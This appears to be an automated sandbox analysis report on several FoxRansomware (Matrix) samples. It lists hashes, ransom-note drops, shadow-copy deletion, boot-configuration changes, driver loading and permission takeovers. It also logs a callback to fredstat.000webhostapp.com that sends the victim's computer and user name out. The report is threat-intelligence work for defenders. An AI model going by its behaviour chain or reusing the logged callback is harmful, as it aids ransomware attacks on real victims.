Overview
Static (score 10)
Behavioral tabs (score | sample | platform):
  3  | FoxRansomw...65.exe | windows7-x64
  10 | FoxRansomw...65.exe | windows10-2004-x64
  10 | FoxRansomw...a7.exe | windows7-x64
  10 | FoxRansomw...a7.exe | windows10-2004-x64
  10 | FoxRansomw...20.exe | windows7-x64
  10 | FoxRansomw...20.exe | windows10-2004-x64
  10 | FoxRansomw...0b.exe | windows7-x64
  10 | FoxRansomw...0b.exe | windows10-2004-x64
  10 | FoxRansomw...53.exe | windows7-x64
  10 | FoxRansomw...53.exe | windows10-2004-x64
  10 | FoxRansomw...b1.exe | windows7-x64
  10 | FoxRansomw...b1.exe | windows10-2004-x64
Analysis (score 10)
max time kernel: 141s
max time network: 121s
platform: windows7_x64
resource: win7-20240319-en
resource tags: arch:x64, arch:x86, image:win7-20240319-en, locale:en-us, os:windows7-x64, system
submitted: 03-04-2024 17:56
Tasks (task | sample | resource)
static1 (static task)
behavioral1 | FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe | win7-20240221-en
behavioral2 | FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe | win10v2004-20240226-en
behavioral3 | FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe | win7-20240221-en
behavioral4 | FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe | win10v2004-20240226-en
behavioral5 | FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe | win7-20240221-en
behavioral6 | FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe | win10v2004-20240226-en
behavioral7 | FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe | win7-20240221-en
behavioral8 | FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe | win10v2004-20240226-en
behavioral9 | FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe | win7-20240221-en
behavioral10 | FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe | win10v2004-20240226-en
behavioral11 | FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe | win7-20240319-en
behavioral12 | FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe | win10v2004-20240226-en
General
Target: FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Size: 1.2MB
MD5: c82d64850d35cc6a536c11adbd261cf6
SHA1: 9f4d070a1b4668d110b57c167c4527fa2752c1fe
SHA256: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1
SHA512: 777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002
SSDEEP: 24576:pLeb4QFvTn5TuJR5ezGPMy4EnBBuKfDW:Qb/GMef
Malware Config
Extracted:
  http://myexternalip.com/raw
Extracted:
  Path: C:\Program Files\Google\Chrome\Application\106.0.5249.119\#KOK8_README#.rtf
  URLs:
    https://bitmsg.me
    https://bitmsg.me/users/sign_up
    https://bitmsg.me/users/sign_in
Signatures

Matrix Ransomware (64 IoCs)
Targeted ransomware with information collection and encryption functionality.
description | ioc | process (flow shown where present)
File created | C:\Program Files\Google\Chrome\Application\106.0.5249.119\MEIPreload\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\VideoLAN\VLC\lua\sd\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Users\Admin\AppData\Local\Adobe\Color\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\VideoLAN\VLC\lua\http\css\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\Microsoft Games\FreeCell\ja-JP\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Users\Public\Music\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Users\Public\Videos\Sample Videos\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
HTTP URL (flow 4) | http://fredstat.000webhostapp.com/addrecord.php?apikey=kok8_api_key&compuser=UEITMFAB|Admin&sid=9Pf67WPtqzeCvwHy&phase=[ALL]4DA22BE0A5EC54A8 | Process not Found
File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\Mozilla Firefox\browser\VisualElements\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\Microsoft Games\Solitaire\fr-FR\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\Microsoft Games\Mahjong\en-US\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\VideoLAN\VLC\skins\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\Microsoft Games\Chess\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\ProgramData\Microsoft\MF\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\Java\jre7\lib\zi\Europe\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\Microsoft Games\FreeCell\es-ES\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6lxhv8bu.default-release\settings\main\ms-language-packs\browser\newtab\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\VideoLAN\VLC\locale\ca@valencia\LC_MESSAGES\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\Google\Chrome\Application\SetupMetrics\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\Microsoft Games\Mahjong\de-DE\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Users\Admin\Music\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\VideoLAN\VLC\plugins\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\ProgramData\Microsoft\Assistance\Client\1.0\fr-FR\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\Microsoft Games\Minesweeper\de-DE\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\Microsoft Games\Multiplayer\Spades\en-US\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\Microsoft Games\More Games\ja-JP\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\P8PFHBEX\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Users\Admin\AppData\Local\Microsoft\Media Player\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\Mozilla Firefox\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Users\Admin\Saved Games\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\#KOK8_README#.rtf | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Control Panel\Desktop\TileWallpaper = "0" | reg.exe
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
pid | process
5848 | bcdedit.exe
5892 | bcdedit.exe

Blocklisted process makes network request (1 IoCs)
flow | pid | process
7 | 2640 | powershell.exe

Drops file in Drivers directory (1 IoCs)
description | ioc | process
File created | C:\Windows\system32\Drivers\PROCEXP152.SYS | D22bUU4y64.exe

Sets service image path in registry (2 TTPs, 1 IoCs)
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" | D22bUU4y64.exe
Executes dropped EXE (64 IoCs)
process | pids (in report order)
NWiBQzcf.exe | 2732
D22bUU4y64.exe | 4084
D22bUU4y.exe | 3936, 2132, 4404, 3032, 5136, 2168, 3672, 5348, 5384, 5492, 5512, 2952, 1720, 5200, 2356, 1472, 5580, 2200, 1688, 2476, 796, 2276, 2636, 2452, 2420, 2168, 1184, 3496, 3552, 1692, 1640, 2332, 2720, 5676, 5672, 3360, 3400, 4744, 4040, 4504, 4436, 5552, 5616, 5596, 3768, 3168, 3892, 4160, 5680, 5788, 5816, 5956, 4116, 4216, 4248, 4276, 4292, 2468, 1772, 4616, 5900, 4792
Loads dropped DLL (64 IoCs)
process | pids (in report order)
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe | 2868, 2868
D22bUU4y.exe | 3936
cmd.exe | 3912, 4236, 2708, 1936, 5736, 936, 5172, 5340, 556, 5448, 4312, 2364, 5544, 5196, 5136, 1224, 1992, 5100, 4904, 2072, 1136, 1084, 1608, 2696, 1672, 3236, 3196, 3424, 3252, 1148, 3504, 3148, 1676, 4428, 280, 4564, 4480, 4736, 4580, 4508, 5740, 5240, 3684, 3716, 3736, 2412, 3172, 5748, 3220, 5720, 5708, 4584, 5824, 4208, 4140, 6132, 4228, 2280, 4304, 5880, 824
Modifies file permissions (1 TTPs, 64 IoCs)
process | pids (in report order)
takeown.exe | 3996, 4732, 4148, 5480, 2040, 3340, 3736, 4276, 3112, 1708, 4932, 4028, 4284, 2072, 1352, 5544, 5876, 5616, 5464, 4800, 3240, 1476, 2240, 692, 3156, 2356, 5148, 4876, 1824, 2984, 5512, 1068, 1996, 1704, 1652, 4820, 5988, 2364, 336, 5816, 2648, 1596, 1092, 1708, 3004, 4032, 3696, 4820, 1580, 4504, 5220, 3612
Process not Found | 3976, 2020, 1532, 3552, 4712, 2760, 2184, 3812, 4732, 5792, 4708, 5100
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

resource | yara_rule (all rows match rule upx)
behavioral11/files/0x0006000000016beb-1313.dat | upx
behavioral11/memory/3936-1353-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/2132-5396-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/2132-5444-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/4404-5963-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/3032-6796-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/5136-6799-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/3672-7013-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/2168-6997-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/5348-7743-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/5384-7747-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/5492-7756-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/5512-7759-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/2952-7768-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/1720-7772-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/5200-7776-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/2356-7780-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/1472-7786-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/5580-7790-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/2200-7796-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/1688-7799-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/2476-7805-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/796-7808-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/796-7809-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/2276-7815-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/2636-7824-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/2452-7830-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/2420-7833-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/2168-7841-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/1184-7845-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/1184-7844-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/3496-7850-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/3552-7853-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/3552-7852-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/1692-7859-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/1640-7861-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/2332-7863-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/2720-7870-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/5676-7874-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/5672-7876-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/3360-7878-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/3400-7880-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/4744-7889-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/4040-7891-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/4504-7895-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/4436-7899-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/5552-7904-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/5616-7905-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/5596-7911-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/3768-7917-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/3168-7919-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/3892-7922-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/4160-7924-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/5680-7925-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/5788-7930-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/5816-7931-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/5956-7933-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/4116-7935-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/4216-7936-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/4248-7939-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/4276-7940-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/4292-7942-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/2468-7943-0x0000000000400000-0x0000000000477000-memory.dmp | upx
behavioral11/memory/5956-7946-0x0000000000400000-0x0000000000477000-memory.dmp | upx
Drops desktop.ini file(s) (40 IoCs)
All rows: File opened for modification | <ioc> | 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini
C:\Program Files\Microsoft Games\Mahjong\desktop.ini
C:\Users\Public\Downloads\desktop.ini
C:\Users\Public\Videos\Sample Videos\desktop.ini
C:\Users\Public\Libraries\desktop.ini
C:\Program Files\Microsoft Games\Chess\desktop.ini
C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\P8PFHBEX\desktop.ini
C:\Users\Public\Recorded TV\Sample Media\desktop.ini
C:\Users\Admin\Searches\desktop.ini
C:\Users\Public\Music\desktop.ini
C:\Users\Public\Videos\desktop.ini
C:\Program Files\desktop.ini
C:\Program Files\Microsoft Games\Solitaire\desktop.ini
C:\Users\Public\Desktop\desktop.ini
C:\Users\Public\Documents\desktop.ini
C:\Program Files\Microsoft Games\FreeCell\desktop.ini
C:\Users\Admin\Favorites\desktop.ini
C:\Users\Admin\Videos\desktop.ini
C:\Users\Admin\Music\desktop.ini
C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\QY1C4128\desktop.ini
C:\Users\Public\Music\Sample Music\desktop.ini
C:\Users\Public\Pictures\Sample Pictures\desktop.ini
C:\Program Files (x86)\desktop.ini
C:\Program Files\Microsoft Games\Hearts\desktop.ini
C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\6ZEZX6DE\desktop.ini
C:\Program Files\Microsoft Games\Purble Place\desktop.ini
C:\Users\Admin\Favorites\Links\desktop.ini
C:\Users\Admin\Favorites\Links for United States\desktop.ini
C:\Users\Admin\Downloads\desktop.ini
C:\Users\Admin\Links\desktop.ini
C:\Users\Admin\Pictures\desktop.ini
C:\Users\Public\Recorded TV\desktop.ini
C:\Users\Public\Pictures\desktop.ini
C:\Users\Admin\Saved Games\desktop.ini
C:\Users\Admin\Desktop\desktop.ini
C:\Users\Admin\Contacts\desktop.ini
C:\Users\Admin\Documents\desktop.ini
C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini
C:\Users\Public\desktop.ini
C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\G5DX35ZA\desktop.ini
Enumerates connected drives (3 TTPs, 44 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
All rows: File opened (read-only); drive roots grouped by process, in report order
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe | \??\V: \??\Z: \??\W: \??\M: \??\Q: \??\N: \??\H: \??\E: \??\R: \??\I: \??\G: \??\K: \??\S: \??\P: \??\T: \??\X: \??\U: \??\L: \??\J: \??\Y: \??\O:
D22bUU4y64.exe | \??\O: \??\X: \??\G: \??\K: \??\S: \??\W: \??\I: \??\L: \??\R: \??\T: \??\A: \??\H: \??\J: \??\Q: \??\V: \??\Y: \??\B: \??\N: \??\P: \??\M: \??\E: \??\U: \??\Z:
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP. In this run the lookup is a plain-HTTP GET of http://myexternalip.com/raw made by powershell.exe (PID 2640) through System.Net.WebClient; the parent cmd.exe redirects the result into C:\Users\Admin\AppData\Local\Temp\FoxRansomware\2AtfLWqd.txt (see the process tree).
flow ioc: 6 myexternalip.com
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process
Set value (str) \REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\Mf8QLzo3.bmp" reg.exe
The same cmd.exe also sets WallpaperStyle and TileWallpaper to "0" (see the process tree), so the dropped bitmap is displayed centred rather than stretched or tiled.
Drops file in Program Files directory 64 IoCs
description ioc Process
All 64 records are from 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe. Ten are the ransom note #KOK8_README#.rtf created in directories the sample walked; the other 54 are existing files opened for modification regardless of extension (extensionless Java zoneinfo files, .jar, .exe, .pak, .ini, .mui), so whatever the sample does to files is not gated on document extensions.

File created (ransom note #KOK8_README#.rtf) in:
  C:\Program Files\Microsoft Games\FreeCell\fr-FR
  C:\Program Files (x86)\Adobe\Reader 9.0
  C:\Program Files\Microsoft Games\Hearts\it-IT
  C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES
  C:\Program Files\Java\jre7\lib\zi
  C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES
  C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc
  C:\Program Files\Microsoft Games\Multiplayer\Checkers\es-ES
  C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES
  C:\Program Files\Microsoft Games\More Games\it-IT

File opened for modification:
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.SF
  C:\Program Files\Java\jdk1.7.0_80\bin\orbd.exe
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-uihandler.jar
